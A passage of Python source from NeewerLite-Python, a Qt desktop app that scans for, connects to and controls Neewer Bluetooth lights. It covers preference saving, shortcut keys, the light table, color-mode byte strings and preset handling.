if customKeys[13] != "9":
finalPrefs.append("SC_Inc_1_Small=" + customKeys[13])
if customKeys[14] != "4":
finalPrefs.append("SC_Dec_2_Small=" + customKeys[14])
if customKeys[15] != "6":
finalPrefs.append("SC_Inc_2_Small=" + customKeys[15])
if customKeys[16] != "1":
finalPrefs.append("SC_Dec_3_Small=" + customKeys[16])
if customKeys[17] != "3":
finalPrefs.append("SC_Inc_3_Small=" + customKeys[17])
if customKeys[18] != "Ctrl+7":
finalPrefs.append("SC_Dec_1_Large=" + customKeys[18])
if customKeys[19] != "Ctrl+9":
finalPrefs.append("SC_Inc_1_Large=" + customKeys[19])
if customKeys[20] != "Ctrl+4":
finalPrefs.append("SC_Dec_2_Large=" + customKeys[20])
if customKeys[21] != "Ctrl+6":
finalPrefs.append("SC_Inc_2_Large=" + customKeys[21])
if customKeys[22] != "Ctrl+1":
finalPrefs.append("SC_Dec_3_Large=" + customKeys[22])
if customKeys[23] != "Ctrl+3":
finalPrefs.append("SC_Inc_3_Large=" + customKeys[23])
# CARRY "HIDDEN" DEBUGGING OPTIONS TO PREFERENCES FILE
if enableTabsOnLaunch == True:
finalPrefs.append("enableTabsOnLaunch=1")
if len(finalPrefs) > 0: # if we actually have preferences to save...
with open(globalPrefsFile, "w") as prefsFileToWrite:
prefsFileToWrite.write(("\n").join(finalPrefs)) # then write them to the prefs file
# PRINT THIS INFORMATION WHETHER DEBUG OUTPUT IS TURNED ON OR NOT
print("New global preferences saved in " + globalPrefsFile + " - here is the list:")
for a in range(len(finalPrefs)):
print(" > " + finalPrefs[a]) # iterate through the list of preferences and show the new value(s) you set
else: # there are no preferences to save, so clean up the file (if it exists)
print("There are no preferences to save (all preferences are currently set to their default values).")
if os.path.exists(globalPrefsFile): # if a previous preferences file exists
print("Since all preferences are set to their defaults, we are deleting the NeewerLite-Python.prefs file.")
os.remove(globalPrefsFile) # ...delete it!
def setupShortcutKeys(self):
self.SC_turnOffButton.setKey(QKeySequence(customKeys[0]))
self.SC_turnOnButton.setKey(QKeySequence(customKeys[1]))
self.SC_scanCommandButton.setKey(QKeySequence(customKeys[2]))
self.SC_tryConnectButton.setKey(QKeySequence(customKeys[3]))
self.SC_Tab_CCT.setKey(QKeySequence(customKeys[4]))
self.SC_Tab_HSI.setKey(QKeySequence(customKeys[5]))
self.SC_Tab_SCENE.setKey(QKeySequence(customKeys[6]))
self.SC_Tab_PREFS.setKey(QKeySequence(customKeys[7]))
self.SC_Dec_Bri_Small.setKey(QKeySequence(customKeys[8]))
self.SC_Inc_Bri_Small.setKey(QKeySequence(customKeys[9]))
self.SC_Dec_Bri_Large.setKey(QKeySequence(customKeys[10]))
self.SC_Inc_Bri_Large.setKey(QKeySequence(customKeys[11]))
# IF THERE ARE CUSTOM KEYS SET UP FOR THE SMALL INCREMENTS, SET THEM HERE (AS THE NUMPAD KEYS WILL BE TAKEN AWAY IN THAT INSTANCE):
if customKeys[12] != "7":
self.SC_Dec_1_Small.setKey(QKeySequence(customKeys[12]))
else: # if we changed back to default, clear the key assignment if there was one before
self.SC_Dec_1_Small.setKey("")
if customKeys[13] != "9":
self.SC_Inc_1_Small.setKey(QKeySequence(customKeys[13]))
else:
self.SC_Inc_1_Small.setKey("")
if customKeys[14] != "4":
self.SC_Dec_2_Small.setKey(QKeySequence(customKeys[14]))
else:
self.SC_Dec_2_Small.setKey("")
if customKeys[15] != "6":
self.SC_Inc_2_Small.setKey(QKeySequence(customKeys[15]))
else:
self.SC_Inc_2_Small.setKey("")
if customKeys[16] != "1":
self.SC_Dec_3_Small.setKey(QKeySequence(customKeys[16]))
else:
self.SC_Dec_3_Small.setKey("")
if customKeys[17] != "3":
self.SC_Inc_3_Small.setKey(QKeySequence(customKeys[17]))
else:
self.SC_Inc_3_Small.setKey("")
self.SC_Dec_1_Large.setKey(QKeySequence(customKeys[18]))
self.SC_Inc_1_Large.setKey(QKeySequence(customKeys[19]))
self.SC_Dec_2_Large.setKey(QKeySequence(customKeys[20]))
self.SC_Inc_2_Large.setKey(QKeySequence(customKeys[21]))
self.SC_Dec_3_Large.setKey(QKeySequence(customKeys[22]))
self.SC_Inc_3_Large.setKey(QKeySequence(customKeys[23]))
# CHECK TO SEE WHETHER OR NOT TO ENABLE/DISABLE THE "Connect" BUTTON OR CHANGE THE PREFS TAB
def selectionChanged(self):
selectedRows = self.selectedLights() # get the list of currently selected lights
if len(selectedRows) > 0: # if we have a selection
self.tryConnectButton.setEnabled(True) # if we have light(s) selected in the table, then enable the "Connect" button
if len(selectedRows) == 1: # we have exactly one light selected
self.ColorModeTabWidget.setTabEnabled(3, True) # enable the "Preferences" tab for this light
# SWITCH THE TURN ON/OFF BUTTONS ON, AND CHANGE TEXT TO SINGLE BUTTON TEXT
self.turnOffButton.setText("Turn Light Off")
self.turnOffButton.setEnabled(True)
self.turnOnButton.setText("Turn Light On")
self.turnOnButton.setEnabled(True)
self.ColorModeTabWidget.setTabEnabled(0, True)
if availableLights[selectedRows[0]][5] == True: # if this light is CCT only, then disable the HSI and ANM tabs
self.ColorModeTabWidget.setTabEnabled(1, False) # disable the HSI mode tab
self.ColorModeTabWidget.setTabEnabled(2, False) # disable the ANM/SCENE tab
else: # we can use HSI and ANM/SCENE modes, so enable those tabs
self.ColorModeTabWidget.setTabEnabled(1, True) # enable the HSI mode tab
self.ColorModeTabWidget.setTabEnabled(2, True) # enable the ANM/SCENE tab
currentlySelectedRow = selectedRows[0] # get the row index of the 1 selected item
self.checkLightTab(currentlySelectedRow) # if we're on CCT, check to see if this light can use extended values + on Prefs, update Prefs
# RECALL LAST SENT SETTING FOR THIS PARTICULAR LIGHT, IF A SETTING EXISTS
if availableLights[currentlySelectedRow][3] != []: # if the last set parameters aren't empty
if availableLights[currentlySelectedRow][6] != False: # if the light is listed as being turned ON
sendValue = availableLights[currentlySelectedRow][3] # make the current "sendValue" the last set parameter so it doesn't re-send it on re-load
if sendValue[1] == 135: # the last parameter was a CCT mode change
self.setUpGUI(colorMode="CCT",
brightness=sendValue[3],
temp=sendValue[4])
elif sendValue[1] == 134: # the last parameter was a HSI mode change
self.setUpGUI(colorMode="HSI",
hue=sendValue[3] + (256 * sendValue[4]),
sat=sendValue[5],
brightness=sendValue[6])
elif sendValue[1] == 136: # the last parameter was a ANM/SCENE mode change
self.setUpGUI(colorMode="ANM",
brightness=sendValue[3],
scene=sendValue[4])
else:
self.ColorModeTabWidget.setCurrentIndex(0) # switch to the CCT tab if the light is off and there ARE prior parameters
else:
self.ColorModeTabWidget.setCurrentIndex(0) # switch to the CCT tab if there are no prior parameters
else: # we have multiple lights selected
# SWITCH THE TURN ON/OFF BUTTONS ON, AND CHANGE TEXT TO MULTIPLE LIGHTS TEXT
self.turnOffButton.setText("Turn Light(s) Off")
self.turnOffButton.setEnabled(True)
self.turnOnButton.setText("Turn Light(s) On")
self.turnOnButton.setEnabled(True)
self.ColorModeTabWidget.setTabEnabled(0, True)
self.ColorModeTabWidget.setTabEnabled(1, True) # enable the "HSI" mode tab
self.ColorModeTabWidget.setTabEnabled(2, True) # enable the "ANM/SCENE" mode tab
self.ColorModeTabWidget.setTabEnabled(3, False) # disable the "Preferences" tab, as we have multiple lights selected
else: # the selection has been cleared or there are no lights to select
currentTab = self.ColorModeTabWidget.currentIndex() # get the currently selected tab (so when we disable the tabs, we stick on the current one)
self.tryConnectButton.setEnabled(False) # if we have no lights selected, disable the Connect button
# SWITCH THE TURN ON/OFF BUTTONS OFF, AND CHANGE TEXT TO GENERIC TEXT
self.turnOffButton.setText("Turn Light(s) Off")
self.turnOffButton.setEnabled(False)
self.turnOnButton.setText("Turn Light(s) On")
self.turnOnButton.setEnabled(False)
self.ColorModeTabWidget.setTabEnabled(0, False) # disable the "CCT" mode tab
self.ColorModeTabWidget.setTabEnabled(1, False) # disable the "HSI" mode tab
self.ColorModeTabWidget.setTabEnabled(2, False) # disable the "ANM/SCENE" mode tab
self.ColorModeTabWidget.setTabEnabled(3, False) # disable the "Preferences" tab, as we have no lights selected
if currentTab != 3:
self.ColorModeTabWidget.setCurrentIndex(currentTab) # disable the tabs, but don't switch the current one shown
else:
self.ColorModeTabWidget.setCurrentIndex(0) # if we're on Prefs, then switch to the CCT tab
self.checkLightTab() # check to see if we're on the CCT tab - if we are, then restore order
def checkLightPrefs(self): # check the new settings and save the custom file
selectedRows = self.selectedLights() # get the list of currently selected lights
if len(selectedRows) == 1: # if we have 1 selected light - which should never be false, as we can't use Prefs with more than 1
availableLights[selectedRows[0]][2] = self.customNameTF.text() # set this light's custom name to the text box
availableLights[selectedRows[0]][4] = self.widerRangeCheck.isChecked() # if the "wider range" box is checked, then allow wider ranges
availableLights[selectedRows[0]][5] = self.onlyCCTModeCheck.isChecked() # if the option to send BRI and HUE separately is checked, then turn that on
# IF A CUSTOM NAME IS SET UP FOR THIS LIGHT, THEN CHANGE THE TABLE TO REFLECT THAT
if availableLights[selectedRows[0]][2] != "":
self.setTheTable([availableLights[selectedRows[0]][2] + " (" + availableLights[selectedRows[0]][0].name + ")" "\n [ʀssɪ: " + str(availableLights[selectedRows[0]][0].rssi) + " dBm]",
"", "", ""], selectedRows[0])
else: # if there is no custom name, then reset the table to show that
self.setTheTable([availableLights[selectedRows[0]][0].name + "\n [ʀssɪ: " + str(availableLights[selectedRows[0]][0].rssi) + " dBm]",
"", "", ""], selectedRows[0])
self.saveLightPrefs(selectedRows[0]) # save the light settings to a special file
def saveLightPrefs(self, lightID): # save a sidecar file with the preferences for a specific light
createLightPrefsFolder() # create the light_prefs folder if it doesn't exist
# GET THE CUSTOM FILENAME FOR THIS FILE, NOTED FROM THE MAC ADDRESS OF THE CURRENT LIGHT
exportFileName = availableLights[lightID][0].address.split(":") # take the colons out of the MAC address
exportFileName = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "".join(exportFileName)
customName = availableLights[lightID][2] # the custom name for this light
widerRange = str(availableLights[lightID][4]) # whether or not the light can use extended CCT ranges
onlyCCTMode = str(availableLights[lightID][5]) # whether or not the light can only use CCT mode
exportString = customName + "|" + widerRange + "|" + onlyCCTMode # the exported string, minus the light last set parameters
if rememberLightsOnExit == True: # if we're supposed to remember the last settings, then add that to the Prefs file
if len(availableLights[lightID][3]) > 0: # if we actually have a value stored for this light
lastSettingsString = ",".join(map(str, availableLights[lightID][3])) # combine all the elements of the last set params
exportString += "|" + lastSettingsString # add it to the exported string
else: # if we don't have a value stored for this light (nothing has changed yet)
exportString += "|" + "120,135,2,100,56,157" # then just give the default (CCT, 5600K, 100%) params
# WRITE THE PREFERENCES FILE
with open(exportFileName, "w") as prefsFileToWrite:
prefsFileToWrite.write(exportString)
if customName != "":
printDebugString("Exported preferences for " + customName + " [" + availableLights[lightID][0].name + "] to " + exportFileName)
else:
printDebugString("Exported preferences for [" + availableLights[lightID][0].name + "] to " + exportFileName)
# ADD A LIGHT TO THE TABLE VIEW
def setTheTable(self, infoArray, rowToChange = -1):
if rowToChange == -1:
currentRow = self.lightTable.rowCount()
self.lightTable.insertRow(currentRow) # if rowToChange is not specified, then we'll make a new row at the end
self.lightTable.setItem(currentRow, 0, QTableWidgetItem())
self.lightTable.setItem(currentRow, 1, QTableWidgetItem())
self.lightTable.setItem(currentRow, 2, QTableWidgetItem())
self.lightTable.setItem(currentRow, 3, QTableWidgetItem())
else:
currentRow = rowToChange # change data for the specified row
# THIS SECTION BELOW LIMITS UPDATING THE TABLE **ONLY** IF THE DATA SUPPLIED IS DIFFERENT THAN IT WAS ORIGINALLY
if infoArray[0] != "": # the name of the light
if rowToChange == -1 or (rowToChange != -1 and infoArray[0] != self.returnTableInfo(rowToChange, 0)):
self.lightTable.item(currentRow, 0).setText(infoArray[0])
if infoArray[1] != "": # the MAC address of the light
if rowToChange == -1 or (rowToChange != -1 and infoArray[1] != self.returnTableInfo(rowToChange, 1)):
self.lightTable.item(currentRow, 1).setText(infoArray[1])
if infoArray[2] != "": # the Linked status of the light
if rowToChange == -1 or (rowToChange != -1 and infoArray[2] != self.returnTableInfo(rowToChange, 2)):
self.lightTable.item(currentRow, 2).setText(infoArray[2])
self.lightTable.item(currentRow, 2).setTextAlignment(Qt.AlignCenter) # align the light status info to be center-justified
if infoArray[3] != "": # the current status message of the light
if rowToChange == -1 or (rowToChange != -1 and infoArray[2] != self.returnTableInfo(rowToChange, 3)):
self.lightTable.item(currentRow, 3).setText(infoArray[3])
self.lightTable.resizeRowsToContents()
def returnTableInfo(self, row, column):
return self.lightTable.item(row, column).text()
# CLEAR ALL LIGHTS FROM THE TABLE VIEW
def clearTheTable(self):
if self.lightTable.rowCount() != 0:
self.lightTable.clearContents()
self.lightTable.setRowCount(0)
def selectRows(self, rowsToSelect):
self.lightTable.clearSelection()
indexes = [self.lightTable.model().index(r, 0) for r in rowsToSelect]
[self.lightTable.selectionModel().select(i, QItemSelectionModel.Select | QItemSelectionModel.Rows) for i in indexes]
# TELL THE BACKGROUND THREAD TO START LOOKING FOR LIGHTS
def startSelfSearch(self):
global threadAction
threadAction = "discover"
self.statusBar.showMessage("Please wait - searching for Neewer lights...")
# TELL THE BACKGROUND THREAD TO START CONNECTING TO LIGHTS
def startConnect(self):
global threadAction
threadAction = "connect"
# TELL THE BACKGROUND THREAD TO START SENDING TO THE LIGHTS
def startSend(self):
global threadAction
if threadAction == "":
threadAction = "send"
# IF YOU CLICK ON ONE OF THE TABS, THIS WILL SWITCH THE VIEW/SEND A NEW SIGNAL FROM THAT SPECIFIC TAB
def tabChanged(self, i):
currentSelection = self.selectedLights() # get the list of currently selected lights
if i == 0: # we clicked on the CCT tab
if len(currentSelection) > 0: # if we have something selected
if len(currentSelection) == 1: # if we have just one light selected
# CHECK THE CURRENT SELECTED LIGHT TO SEE IF IT CAN USE EXTENDED COLOR TEMPERATURES
self.checkLightTab(currentSelection[0]) # set up the current light's CCT bounds
if availableLights[currentSelection[0]][6] != False: # if the light that's selected is off, then don't update CCT value
self.computeValueCCT() # calculate the current CCT value
else: # if we have more than one light selected
self.checkLightTab() # reset the bounds to the normal values (5600K)
elif i == 1: # we clicked on the HSI tab
if len(currentSelection) == 1: # if we have only one thing selected
if availableLights[currentSelection[0]][6] != False: # if the light that's selected is off, then don't update HSI value
self.computeValueHSI() # calculate the current HSI value
elif i == 2: # we clicked on the ANM tab
pass # skip this, we don't want the animation automatically triggering when we go to this page - but keep it for readability
elif i == 3: # we clicked on the PREFS tab
if len(currentSelection) == 1: # this tab function ^^ should *ONLY* call if we have just one light selected, but just in *case*
self.setupLightPrefsTab(currentSelection[0])
elif i == 4: # we clicked on the Global PREFS tab
self.setupGlobalLightPrefsTab()
# COMPUTE A BYTESTRING FOR THE CCT SECTION
def computeValueCCT(self, hueOrBrightness = -1):
global CCTSlider
# CCTSlider = -1 # force this value to -1 to send both hue and brightness at the same time on SNL-660
CCTSlider = hueOrBrightness # set the global CCT "current slider" to the slider you just... slid
self.TFV_CCT_Hue.setText(str(self.Slider_CCT_Hue.value()) + "00K")
calculateByteString(colorMode="CCT",\
temp=str(int(self.Slider_CCT_Hue.value())),\
brightness=str(int(self.Slider_CCT_Bright.value())))
self.statusBar.showMessage("Current value (CCT Mode): " + updateStatus())
self.startSend()
# COMPUTE A BYTESTRING FOR THE HSI SECTION
def computeValueHSI(self):
calculateByteString(colorMode="HSI",\
HSI_H=str(int(self.Slider_HSI_1_H.value())),\
HSI_S=str(int(self.Slider_HSI_2_S.value())),\
HSI_I=str(int(self.Slider_HSI_3_L.value())))
self.statusBar.showMessage("Current value (HSI Mode): " + updateStatus())
self.startSend()
# COMPUTE A BYTESTRING FOR THE ANIM SECTION
def computeValueANM(self, buttonPressed):
global lastAnimButtonPressed
if buttonPressed == 0:
buttonPressed = lastAnimButtonPressed
else:
# CHANGE THE OLD BUTTON COLOR BACK TO THE DEFAULT COLOR
if lastAnimButtonPressed == 1:
self.Button_1_police_A.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 2:
self.Button_1_police_B.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 3:
self.Button_1_police_C.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 4:
self.Button_2_party_A.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 5:
self.Button_2_party_B.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 6:
self.Button_2_party_C.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 7:
self.Button_3_lightning_A.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 8:
self.Button_3_lightning_B.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 9:
self.Button_3_lightning_C.setStyleSheet("background-color : None")
# CHANGE THE NEW BUTTON COLOR TO SHOW WHICH ANIMATION WE'RE CURRENTLY ON
if buttonPressed == 1:
self.Button_1_police_A.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 2:
self.Button_1_police_B.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 3:
self.Button_1_police_C.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 4:
self.Button_2_party_A.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 5:
self.Button_2_party_B.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 6:
self.Button_2_party_C.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 7:
self.Button_3_lightning_A.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 8:
self.Button_3_lightning_B.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 9:
self.Button_3_lightning_C.setStyleSheet("background-color : aquamarine")
lastAnimButtonPressed = buttonPressed
calculateByteString(colorMode="ANM",\
brightness=str(int(self.Slider_ANM_Brightness.value())),\
animation=str(buttonPressed))
self.statusBar.showMessage("Current value (ANM Mode): " + updateStatus())
self.startSend()
def turnLightOn(self):
setPowerBytestring("ON")
self.statusBar.showMessage("Turning light on")
self.startSend()
def turnLightOff(self):
setPowerBytestring("OFF")
self.statusBar.showMessage("Turning light off")
self.startSend()
# ==============================================================
# FUNCTIONS TO RETURN / MODIFY VALUES RUNNING IN THE GUI
# ==============================================================
# RETURN THE ROW INDEXES THAT ARE CURRENTLY HIGHLIGHTED IN THE TABLE VIEW
def selectedLights(self):
selectionList = []
if threadAction != "quit":
currentSelection = self.lightTable.selectionModel().selectedRows()
for a in range(len(currentSelection)):
selectionList.append(currentSelection[a].row()) # add the row index of the nth selected light to the selectionList array
return selectionList # return the row IDs that are currently selected, or an empty array ([]) otherwise
# UPDATE THE TABLE WITH THE CURRENT INFORMATION FROM availableLights
def updateLights(self, updateTaskbar = True):
self.clearTheTable()
if updateTaskbar == True: # if we're scanning for lights, then update the taskbar - if we're just sorting, then don't
if len(availableLights) != 0: # if we found lights on the last scan
if self.scanCommandButton.text() == "Scan":
self.scanCommandButton.setText("Re-scan") # change the "Scan" button to "Re-scan"
if len(availableLights) == 1: # we found 1 light
self.statusBar.showMessage("We located 1 Neewer light on the last search")
elif len(availableLights) > 1: # we found more than 1 light
self.statusBar.showMessage("We located " + str(len(availableLights)) + " Neewer lights on the last search")
else: # if we didn't find any (additional) lights on the last scan
self.statusBar.showMessage("We didn't locate any Neewer lights on the last search")
for a in range(len(availableLights)):
if availableLights[a][1] == "": # the light does not currently have a Bleak object connected to it
if availableLights[a][2] != "": # the light has a custom name, so add the custom name to the light
self.setTheTable([availableLights[a][2] + " (" + availableLights[a][0].name + ")" + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "Waiting", "Waiting to connect..."])
else: # the light does not have a custom name, so just use the model # of the light
self.setTheTable([availableLights[a][0].name + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "Waiting", "Waiting to connect..."])
else: # the light does have a Bleak object connected to it
if availableLights[a][2] != "": # the light has a custom name, so add the custom name to the light
if availableLights[a][1].is_connected: # we have a connection to the light
self.setTheTable([availableLights[a][2] + " (" + availableLights[a][0].name + ")" + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "LINKED", "Waiting to send..."])
else: # we're still trying to connect, or haven't started trying yet
self.setTheTable([availableLights[a][2] + " (" + availableLights[a][0].name + ")" + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "Waiting", "Waiting to connect..."])
else: # the light does not have a custom name, so just use the model # of the light
if availableLights[a][1].is_connected:
self.setTheTable([availableLights[a][0].name + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "LINKED", "Waiting to send..."])
else:
self.setTheTable([availableLights[a][0].name + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "Waiting", "Waiting to connect..."])
# THE FINAL FUNCTION TO UNLINK ALL LIGHTS WHEN QUITTING THE PROGRAM
def closeEvent(self, event):
global threadAction
# WAIT UNTIL THE BACKGROUND THREAD SETS THE threadAction FLAG TO finished SO WE CAN UNLINK THE LIGHTS
while threadAction != "finished": # wait until the background thread has a chance to terminate
printDebugString("Waiting for the background thread to terminate...")
threadAction = "quit" # make sure to tell the thread to quit again (if it missed it the first time)
time.sleep(2)
if rememberPresetsOnExit == True:
printDebugString("You asked NeewerLite-Python to save the custom parameters on exit, so we will do that now...")
customPresetsToWrite = [] # the list of custom presets to write to file
# CHECK EVERY SINGLE CUSTOM PRESET AGAINST THE "DEFAULT" LIST, AND IF IT'S DIFFERENT, THEN LOG THAT ONE
if customLightPresets[0] != defaultLightPresets[0]:
customPresetsToWrite.append(customPresetToString(0))
if customLightPresets[1] != defaultLightPresets[1]:
customPresetsToWrite.append(customPresetToString(1))
if customLightPresets[2] != defaultLightPresets[2]:
customPresetsToWrite.append(customPresetToString(2))
if customLightPresets[3] != defaultLightPresets[3]:
customPresetsToWrite.append(customPresetToString(3))
if customLightPresets[4] != defaultLightPresets[4]:
customPresetsToWrite.append(customPresetToString(4))
if customLightPresets[5] != defaultLightPresets[5]:
customPresetsToWrite.append(customPresetToString(5))
if customLightPresets[6] != defaultLightPresets[6]:
customPresetsToWrite.append(customPresetToString(6))
if customLightPresets[7] != defaultLightPresets[7]:
customPresetsToWrite.append(customPresetToString(7))
if customPresetsToWrite != []: # if there are any altered presets, then write them to the custom presets file
createLightPrefsFolder() # create the light_prefs folder if it doesn't exist
# WRITE THE PREFERENCES FILE
with open(customLightPresetsFile, "w") as prefsFileToWrite:
prefsFileToWrite.write("\n".join(customPresetsToWrite))
printDebugString("Exported custom presets to " + customLightPresetsFile)
else:
if os.path.exists(customLightPresetsFile):
printDebugString("There were no changed custom presets, so we're deleting the custom presets file!")
os.remove(customLightPresetsFile) # if there are no presets to save, then delete the custom presets file
# Keep in mind, this is broken into 2 separate "for" loops, so we save all the light params FIRST, then try to unlink from them
if rememberLightsOnExit == True:
printDebugString("You asked NeewerLite-Python to save the last used light parameters on exit, so we will do that now...")
for a in range(len(availableLights)):
printDebugString("Saving last used parameters for light #" + str(a + 1) + " (" + str(a + 1) + " of " + str(len(availableLights)) + ")")
self.saveLightPrefs(a)
# THE THREAD HAS TERMINATED, NOW CONTINUE...
printDebugString("We will now attempt to unlink from the lights...")
self.statusBar.showMessage("Quitting program - unlinking from lights...")
QApplication.processEvents() # force the status bar to update
loop = asyncio.get_event_loop()
loop.run_until_complete(parallelAction("disconnect", [-1])) # disconnect from all lights in parallel
printDebugString("Closing the program NOW")
def saveCustomPresetDialog(self, numOfPreset):
if (QApplication.keyboardModifiers() & Qt.AltModifier) == Qt.AltModifier: # if you have the ALT key held down
customLightPresets[numOfPreset] = defaultLightPresets[numOfPreset] # then restore the default for this preset
# And change the button display back to "PRESET GLOBAL"
if numOfPreset == 0:
self.customPreset_0_Button.markCustom(0, -1)
if numOfPreset == 1:
self.customPreset_1_Button.markCustom(1, -1)
if numOfPreset == 2:
self.customPreset_2_Button.markCustom(2, -1)
if numOfPreset == 3:
self.customPreset_3_Button.markCustom(3, -1)
if numOfPreset == 4:
self.customPreset_4_Button.markCustom(4, -1)
if numOfPreset == 5:
self.customPreset_5_Button.markCustom(5, -1)
if numOfPreset == 6:
self.customPreset_6_Button.markCustom(6, -1)
if numOfPreset == 7:
self.customPreset_7_Button.markCustom(7, -1)
else:
if len(availableLights) == 0: # if we don't have lights, then we can't save a preset!
errDlg = QMessageBox(self)
errDlg.setWindowTitle("Can't Save Preset!")
errDlg.setText("You can't save a custom preset at the moment because you don't have any lights set up yet. To save a custom preset, connect a light to NeewerLite-Python first.")
errDlg.addButton("OK", QMessageBox.ButtonRole.AcceptRole)
errDlg.setIcon(QMessageBox.Warning)
errDlg.exec_()
else: # we have lights, we can do it!
selectedLights = self.selectedLights() # get the currently selected lights
saveDlg = QMessageBox(self)
saveDlg.setWindowTitle("Save a Custom Preset")
saveDlg.setTextFormat(Qt.TextFormat.RichText)
saveDlg.setText("Would you like to save a <em>Global</em> or <em>Snapshot</em> preset for preset " + str(numOfPreset + 1) + "?" + "<hr>"
"A <em>Global Preset</em> saves only the currently set global parameters (mode, hue, color temperature, brightness, etc.) and applies that global preset to all the lights that are currently selected.<br><br>"
"A <em>Snapshot Preset</em> saves the currently set parameters for each light individually, allowing you to recall more complex lighting setups. You can also either set a <em>snapshot preset</em> for a series of selected lights (you have to select 1 or more lights for this option), or all the currently available lights. If you save a <em>snapshot preset</em> of a series of selected lights, it will only apply the settings for those specific lights.")
saveDlg.addButton(" Global Preset ", QMessageBox.ButtonRole.YesRole)
saveDlg.addButton(" Snapshot Preset - All Lights ", QMessageBox.ButtonRole.YesRole)
selectedLightsQuestion = 0
if selectedLights != []:
saveDlg.addButton(" Snapshot Preset - Selected Lights ", QMessageBox.ButtonRole.YesRole)
selectedLightsQuestion = 1
saveDlg.addButton(" Cancel ", QMessageBox.ButtonRole.RejectRole)
saveDlg.setIcon(QMessageBox.Question)
clickedButton = saveDlg.exec_()
if clickedButton == 0: # save a "Global" preset
saveCustomPreset("global", numOfPreset)
elif clickedButton == 1: # save a "Snapshot" preset with all lights
saveCustomPreset("snapshot", numOfPreset)
elif clickedButton == 2: # save a "Snapshot" preset with only the selected lights
saveCustomPreset("snapshot", numOfPreset, selectedLights)
if clickedButton != (2 + selectedLightsQuestion): # if we didn't cancel out, then mark that button as being "custom"
if numOfPreset == 0:
self.customPreset_0_Button.markCustom(0, clickedButton)
if numOfPreset == 1:
self.customPreset_1_Button.markCustom(1, clickedButton)
if numOfPreset == 2:
self.customPreset_2_Button.markCustom(2, clickedButton)
if numOfPreset == 3:
self.customPreset_3_Button.markCustom(3, clickedButton)
if numOfPreset == 4:
self.customPreset_4_Button.markCustom(4, clickedButton)
if numOfPreset == 5:
self.customPreset_5_Button.markCustom(5, clickedButton)
if numOfPreset == 6:
self.customPreset_6_Button.markCustom(6, clickedButton)
if numOfPreset == 7:
self.customPreset_7_Button.markCustom(7, clickedButton)
def highlightLightsForSnapshotPreset(self, numOfPreset, exited = False):
global lastSelection
if exited == False: # if we're entering a snapshot preset, then highlight the affected lights in green
toolTip = customPresetInfoBuilder(numOfPreset)
# LOAD A NEWLY GENERATED TOOLTIP FOR EVERY HOVER
if numOfPreset == 0:
self.customPreset_0_Button.setToolTip(toolTip)
elif numOfPreset == 1:
self.customPreset_1_Button.setToolTip(toolTip)
elif numOfPreset == 2:
self.customPreset_2_Button.setToolTip(toolTip)
elif numOfPreset == 3:
self.customPreset_3_Button.setToolTip(toolTip)
elif numOfPreset == 4:
self.customPreset_4_Button.setToolTip(toolTip)
elif numOfPreset == 5:
self.customPreset_5_Button.setToolTip(toolTip)
elif numOfPreset == 6:
self.customPreset_6_Button.setToolTip(toolTip)
elif numOfPreset == 7:
self.customPreset_7_Button.setToolTip(toolTip)
lightsToHighlight = self.checkForSnapshotPreset(numOfPreset)
if lightsToHighlight != []:
lastSelection = self.selectedLights() # store the current selection to restore it when leaving the control
self.lightTable.clearSelection() # clear the current selection to allow the preset to shine
for a in range(len(lightsToHighlight)):
for b in range(4):
self.lightTable.item(lightsToHighlight[a], b).setBackground(QColor(113, 233, 147)) # set the affected rows the same color as the snapshot button
else: # if we're exiting a snapshot preset, then reset the color of the affected lights back to white
lightsToHighlight = self.checkForSnapshotPreset(numOfPreset)
if lightsToHighlight != []:
self.selectRows(lastSelection) # re-highlight the last selected lights on exit
for a in range(len(lightsToHighlight)):
for b in range(4):
self.lightTable.item(lightsToHighlight[a], b).setBackground(Qt.white) # clear formatting on the previously selected rows
def checkForSnapshotPreset(self, numOfPreset):
if customLightPresets[numOfPreset][0][0] != -1: # if the value is not -1, then we most likely have a snapshot preset
lightsToHighlight = []
for a in range(len(customLightPresets[numOfPreset])): # check each entry in the preset for matching lights
currentLight = returnLightIndexesFromMacAddress(customLightPresets[numOfPreset][a][0])
if currentLight != []: # if we have a match, add it to the list of lights to highlight
lightsToHighlight.append(currentLight[0])
return lightsToHighlight
else:
return [] # if we don't have a snapshot preset, then just return an empty list (no lights directly affected)
# SET UP THE GUI BASED ON COMMAND LINE ARGUMENTS
def setUpGUI(self, **modeArgs):
if modeArgs["colorMode"] == "CCT":
self.ColorModeTabWidget.setCurrentIndex(0)
self.Slider_CCT_Hue.setValue(modeArgs["temp"])
self.Slider_CCT_Bright.setValue(modeArgs["brightness"])
self.computeValueCCT()
elif modeArgs["colorMode"] == "HSI":
self.ColorModeTabWidget.setCurrentIndex(1)
self.Slider_HSI_1_H.setValue(modeArgs["hue"])
self.Slider_HSI_2_S.setValue(modeArgs["sat"])
self.Slider_HSI_3_L.setValue(modeArgs["brightness"])
self.computeValueHSI()
elif modeArgs["colorMode"] == "ANM":
self.ColorModeTabWidget.setCurrentIndex(2)
self.Slider_ANM_Brightness.setValue(modeArgs["brightness"])
self.computeValueANM(modeArgs["scene"])
except NameError:
